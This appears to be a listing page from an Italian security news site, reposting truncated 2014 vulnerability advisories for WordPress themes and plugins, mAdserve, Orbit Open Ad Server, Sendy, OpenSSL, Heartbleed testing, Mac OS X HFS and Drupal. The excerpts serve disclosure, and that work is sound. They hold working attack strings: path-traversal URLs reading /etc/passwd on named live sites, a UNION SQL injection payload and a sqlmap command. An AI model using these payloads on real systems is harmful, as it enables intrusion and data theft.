WordPress LineNity Local File Inclusion

23 aprile 2014 - Fonte: http://www.mondounix.com
[+] Local File Inclusion in WordPress Theme LineNity  
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] 
[+] PoC: http://www.mom-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
         http://sport.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
         http://SITE/wp-content/themes/linenity/functions/download.php?imgurl=download.php

...

Leggi il seguito »

mAdserve SQL Injection

16 aprile 2014 - Fonte: http://www.mondounix.com
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in mAdserve, which can be 
exploited to execute arbitrary SQL commands in application’s database and compromise vulnerable website.
 
 
1) SQL Injection in mAdserve: CVE-2014-2654
 
1.1 The vulnerability exists due to insufficient sanitization of user Input passed via the "id" HTTP GET parameter to 
"/www/cp/edit_ad_unit.php" script. A remote authenticated attacker can inject and execute arbitrary SQL commands in 
application’s database and gain complete control over the application.  
 
The exploitation example below displays version of MySQL server:
 
http://[host]/www/cp/edit_ad_unit.php?id=1%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,version%28%29,13,14,15,16,17%20--%202
 
 
1.2...

Leggi il seguito »

Should openssl accept weak DSA/DH keys with g = +/- 1 ?

15 aprile 2014 - Fonte: http://www.mondounix.com
openssl accepts DSA (and probably DH) keys with
g=1 (or g= -1). Both are extremely weak, in
practice plaintext.
 
g=1 works all the time
g= -1 works about half the time in DSA
(on vanilla openssl).
 
Is there a MITM implication in this,
e.g. can a MITM convince both parties
that g=1 -- in this case the private keys
won't matter in DH.
 
Attached are certs.
$ openssl x509 -text -in certg=1.pem
G:    1 (0x1)
 
#server
$openssl s_server -accept 8888 -cert ./certg=1.pem -key certg=1.key -CAfile ./cacert.pem -www
 
#client
$ openssl s_client -connect localhost:8888 -showcerts -CAfile cacert.pem
Verify return code: 0 (ok)
 
-- 
blog:  https://j.ludost.net/blog

(16)

...

Leggi il seguito »

heartbleed-masstest POC

14 aprile 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
 
# Based on the original code by Jared Stafford.
 
# NOTE: this code has been modified to test for OpenSSL versions vulnerable to 
# Heartbleed without exploiting the server, therefore the heartbeat request
# does _not_ cause the server to leak any data from memory or expose any data
# in an unauthorized manner.
# Based on: https://github.com/dchan/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
# See: https://blog.mozilla.org/security/2014/04/12/testing-for-heartbleed-vulnerability-without-exploiting-the-server/
 
# Usage example: python ssltest.py example.com
 
import sys
import struct
import socket
import time
import select
import re
import threading
import...

Leggi il seguito »

Orbit Open Ad Server SQL Injection

10 aprile 2014 - Fonte: http://www.mondounix.com
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to 
perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control 
over the vulnerable website.
 
1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540
 
Input passed via the "site_directory_sort_field" HTTP POST parameter to "/guest/site_directory" URL is not properly 
sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.
 
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application...

Leggi il seguito »

Sendy 1.1.9.1 – SQL Injection Vulnerability

10 aprile 2014 - Fonte: http://www.mondounix.com
Sendy contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /send-to script not 
properly sanitizing user-supplied input to the "c" parameter. This may allow a remote attacker to inject or manipulate 
SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
 
Proofs:
 
# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; 
logged_in=[logged_in value]" -p c -D sendy --tables
 
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is...

Leggi il seguito »

MacOSX 10.9.2/XNU HFS Multiple Vulnerabilities

7 aprile 2014 - Fonte: http://www.mondounix.com
MacOSX/XNU HFS Multiple Vulnerabilities
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
 
===================
 
On November 8th, I've reported vulnerability in hard links for HFS+
(CVE-2013-6799)
 
http://cxsecurity.com/issue/WLB-2013110059
 
The HFS+ file system does not apply strict privilege rules during the
creating of hard links. The ability to create hard links to directories is
wrong implemented and such an issue is affecting os versions greater or
equal to 10.5. Officially Apple allows you to create hard links only for
your time machine. <see wiki> Vulnerability CVE-2013-6799 (incomplete fix
for CVE-2010-0105) allow to create hard link to directory and the number of
hard links...

Leggi il seguito »

Drupal 7.26 Custom Search 7.x-1.13 Cross Site Scripting

3 aprile 2014 - Fonte: http://www.mondounix.com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Vulnerability Report
 
 
Author: Justin C. Klein Keane <justin@madirish.net>
Reported: 19 Feb, 2014
 
 
Description of Vulnerability:
- -----------------------------
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Custom Search module "alters the default
search box in many ways. If you need to have options available like in
advanced search, but directly in the search box, this module is for
you."  The Drupal Custom Search module
(https://drupal.org/project/custom_search) contains a persistent cross
site scripting (XSS) vulnerability due to the fact that it fails to
sanitize filter labels...

Leggi il seguito »

WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 aprile 2014 - Fonte: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are much more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...

Leggi il seguito »

WordPress XCloner 3.1.0 Cross Site Request Forgery

3 aprile 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23206
Product: XCloner Wordpress plugin
Vendor: XCloner
Vulnerable Version(s): 3.1.0 and probably prior
Tested Version: 3.1.0
Advisory Publication:  March 12, 2014  [without technical details]
Vendor Notification: March 12, 2014 
Vendor Patch: March 13, 2014 
Public Disclosure: April 2, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2340
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...

Leggi il seguito »